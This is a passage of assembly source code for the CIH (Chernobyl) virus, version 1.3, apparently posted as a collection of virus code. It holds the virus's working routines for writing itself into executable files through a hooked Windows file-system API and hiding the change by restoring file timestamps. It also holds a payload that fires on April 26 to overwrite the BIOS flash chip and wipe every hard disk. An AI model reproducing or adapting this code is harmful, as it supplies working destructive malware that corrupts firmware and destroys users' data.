cih_13.asm

一些病毒源代码

			; Adjust Size of Virus Section Code to Correct Value
			add	[eax], ebp
			add	[esp+08h], ebp

			; Set End Mark
			xor	ebx, ebx
			mov	[eax-04h], ebx

; ***************************
; * When VirusGame Calls    *
; * VxDCall, VMM Modifies   *
; * the 'int 20h' and the   *
; * 'Service Identifier'    *
; * to 'Call [XXXXXXXX]'.   *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First.     ^__^    *
; ***************************

			lea	eax, (LastVxDCallAddress-2-@9)[esi]

			mov	cl, VxDCallTableSize

LoopOfRestoreVxDCallID:
			mov	word ptr [eax], 20cdh

			mov	edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
			mov	[eax+2], edx

			movzx	edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
			sub	eax, edx

			loop	LoopOfRestoreVxDCallID

; ***************************
; * Let's Write             *
; * Virus Code to the File  *
; ***************************

WriteVirusCodeToFile:
			mov	eax, dr1
			mov	ebx, [eax+10h]
			mov	edi, [eax]

LoopOfWriteVirusCodeToFile:

			pop	ecx
			jecxz	SetFileModificationMark

			mov	esi, ecx
			mov	eax, 0d601h
			pop	edx
			pop	ecx

			call	edi	; VXDCall IFSMgr_Ring0_FileIO

			jmp	LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==>    *
; * Need to Restore File    *
; * Modification Time       *
; ***************************

SetFileModificationMark:
			pop	ebx
			pop	eax

			stc		; Enable CF(Carry Flag)
			pushf

; *************************************
; * Close File                        *
; *************************************

CloseFile:
			xor	eax, eax
			mov	ah, 0d7h
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !?                           *
; *************************************

			popf
			pop	esi
			jnc	IsKillComputer

; *************************************
; * Restore File Modification Time    *
; *************************************

			mov	ebx, edi

			mov	ax, 4303h
			mov	ecx, (FileModificationTime-@7)[esi]
			mov	edi, (FileModificationTime+2-@7)[esi]
			call	ebx	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy                    *
; *************************************

DisableOnBusy:
			dec	byte ptr (OnBusy-@7)[esi]	; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook   *
; *************************************

prevhook:
			popad

			mov	eax, dr0	;
			jmp	[eax]		; Jump to prevhook

; *************************************
; * Call the Function that the IFS    *
; * Manager Would Normally Call to    *
; * Implement this Particular I/O     *
; * Request.                          *
; *************************************

pIFSFunc:
			mov	ebx, esp
			push	dword ptr [ebx+20h+04h+14h]	; Push pioreq
			call	[ebx+20h+04h]			; Call pIFSFunc
			pop	ecx				;

			mov	[ebx+1ch], eax	; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the  *
; * Returned pioreq.        *
; ***************************

			cmp	dword ptr [ebx+20h+04h+04h], 00000024h
			jne	QuitMyVirusFileSystemHook

; *****************
; * Get the File  *
; * Modification  *
; * Date and Time *
; * in DOS Format.*
; *****************

			mov	eax, [ecx+28h]
			mov	(FileModificationTime-@6)[esi], eax

; ***************************
; * Quit My Virus'          *
; * IFSMgr_FileSystemHook   *
; ***************************

QuitMyVirusFileSystemHook:

			popad

			ret

; *************************************
; * Kill Computer !? ...   *^_^*      *
; *************************************

IsKillComputer:
			; Get Now Month from BIOS CMOS
			mov	ax, 0708h
			out	70h, al
			in	al, 71h

			xchg	ah, al

			; Get Now Day from BIOS CMOS
			out	70h, al
			in	al, 71h

			xor	ax, 0426h	; 04/26/????
			jne	DisableOnBusy

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM        *
; ***************************

			mov	bp, 0cf8h
			lea	esi, IOForEEPROM-@7[esi]

; ***********************
; * Show BIOS Page in   *
; * 000E0000 - 000EFFFF *
; *    (   64 KB   )    *
; ***********************

			mov	edi, 8000384ch
			mov	dx, 0cfeh
			cli
			call	esi

; ***********************
; * Show BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    (   64 KB   )    *
; ***********************

			mov	di, 0058h
			dec	edx					; and al,0fh
			mov	word ptr (BooleanCalculateCode-@10)[esi], 0f24h
			call	esi

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; *   (   512 Bytes   ) *
; * , and the Section   *
; * of Extra BIOS can   *
; * be Writted...       *
; ***********************

			lea	ebx, EnableEEPROMToWrite-@10[esi]

			mov	eax, 0e5555h
			mov	ecx, 0e2aaah
			call	ebx
			mov	byte ptr [eax], 60h

			push	ecx
			loop	$

; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E007F *
; *   (   80h Bytes   ) *
; ***********************

			xor	ah, ah
			mov	[eax], al

			xchg	ecx, eax
			loop	$

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; *   (   128 KB   )    *
; * can be Writted...   *
; ***********************

			mov	eax, 0f5555h
			pop	ecx
			mov	ch, 0aah
			call	ebx
			mov	byte ptr [eax], 20h

			loop	$

; ***********************
; * Kill the BIOS Main  *
; * ROM Data in Memory  *
; * 000FE000 - 000FE07F *
; *   (   80h Bytes   ) *
; ***********************

			mov	ah, 0e0h
			mov	[eax], al

; ***********************
; * Hide BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    (   64 KB   )    *
; ***********************
									; or al,10h
			mov	word ptr (BooleanCalculateCode-@10)[esi], 100ch
			call	esi

; ***************************
; * Kill All HardDisk       *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs          *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************

KillHardDisk:
			xor	ebx, ebx
			mov	bh, FirstKillHardDiskNumber
			push	ebx
			sub	esp, 2ch
			push	0c0001000h
			mov	bh, 08h
			push	ebx
			push	ecx
			push	ecx
			push	ecx
			push	40000501h
			inc	ecx
			push	ecx
			push	ecx

			mov	esi, esp
			sub	esp, 0ach

LoopOfKillHardDisk:
			int	20h
			dd	00100004h	; VXDCall IOS_SendCommand

			cmp	word ptr [esi+06h], 0017h
			je	KillNextDataSection

ChangeNextHardDisk:
			inc	byte ptr [esi+4dh]

			jmp	LoopOfKillHardDisk

KillNextDataSection:
			add	dword ptr [esi+10h], ebx
			mov	byte ptr [esi+4dh], FirstKillHardDiskNumber

			jmp	LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write  *
; ***************************

EnableEEPROMToWrite:
			mov	[eax], cl
			mov	[ecx], al
			mov	byte ptr [eax], 80h
			mov	[eax], cl
			mov	[ecx], al

			ret

; ***************************
; * IO for EEPROM           *
; ***************************

IOForEEPROM:
@10			=	IOForEEPROM

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, eax

			xchg	eax, edi
			xchg	edx, ebp
			in	al, dx

BooleanCalculateCode	=	$
			or	al, 44h

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, eax

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, al

			ret

; *********************************************************
; *			Static Data                       *
; *********************************************************

LastVxDCallAddress	=	IFSMgr_Ring0_FileIO
VxDCallAddressTable	db	00h
			db	IFSMgr_RemoveFileSystemApiHook-_PageAllocate
			db	UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
			db	IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable		dd	00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize	=	($-VxDCallIDTable)/04h

; *********************************************************
; *                Virus Version Copyright                *
; *********************************************************

VirusVersionCopyright	db	'CIH v'
			db	MajorVirusVersion+'0'
			db	'.'
			db	MinorVirusVersion+'0'
			db	' TTIT'

; *********************************************************
; *			Virus Size                        *
; *********************************************************

VirusSize			=	$
;				+ SizeOfVirusCodeSectionTableEndMark(04h)
;				+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;				+ SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *			Dynamic Data                      *
; *********************************************************

VirusGameDataStartAddress	=	VirusSize
@6				=	VirusGameDataStartAddress
OnBusy				db	0
FileModificationTime		dd	?

FileNameBuffer		db	FileNameBufferSize dup(?)
@7			=	FileNameBuffer

DataBuffer		=	$
@8			=	DataBuffer
NumberOfSections	dw	?
TimeDateStamp		dd	?
SymbolsPointer		dd	?
NumberOfSymbols		dd	?
SizeOfOptionalHeader	dw	?
_Characteristics	dw	?
Magic			dw	?
LinkerVersion		dw	?
SizeOfCode		dd	?
SizeOfInitializedData	dd	?
SizeOfUninitializedData	dd	?
AddressOfEntryPoint	dd	?
BaseOfCode		dd	?
BaseOfData		dd	?
ImageBase		dd	?
@9			=	$
SectionAlignment	dd	?
FileAlignment		dd	?
OperatingSystemVersion	dd	?
ImageVersion		dd	?
SubsystemVersion	dd	?
Reserved		dd	?
SizeOfImage		dd	?
SizeOfHeaders		dd	?
SizeOfImageHeaderToRead		=	$-NumberOfSections

NewAddressOfEntryPoint	=	DataBuffer	; DWORD
SizeOfImageHeaderToWrite	=	04h

StartOfSectionTable	=	@9
SectionName		=	StartOfSectionTable	; QWORD
VirtualSize		=	StartOfSectionTable+08h	; DWORD
VirtualAddress		=	StartOfSectionTable+0ch	; DWORD
SizeOfRawData		=	StartOfSectionTable+10h	; DWORD
PointerToRawData	=	StartOfSectionTable+14h	; DWORD
PointerToRelocations	=	StartOfSectionTable+18h	; DWORD
PointerToLineNumbers	=	StartOfSectionTable+1ch	; DWORD
NumberOfRelocations	=	StartOfSectionTable+20h	; WORD
NumberOfLinenNmbers	=	StartOfSectionTable+22h	; WORD
Characteristics		=	StartOfSectionTable+24h	; DWORD
SizeOfScetionTable	=	Characteristics+04h-SectionName

; *********************************************************
; *		Virus Total Need Memory                   *
; *********************************************************

VirusNeedBaseMemory	=	$

VirusTotalNeedMemory	=	@9
;				+ NumberOfSections(??)*SizeOfScetionTable(28h)
;				+ SizeOfVirusCodeSectionTableEndMark(04h)
;				+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;				+ SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *********************************************************

VirusGame               ENDS

                        END     FileHeader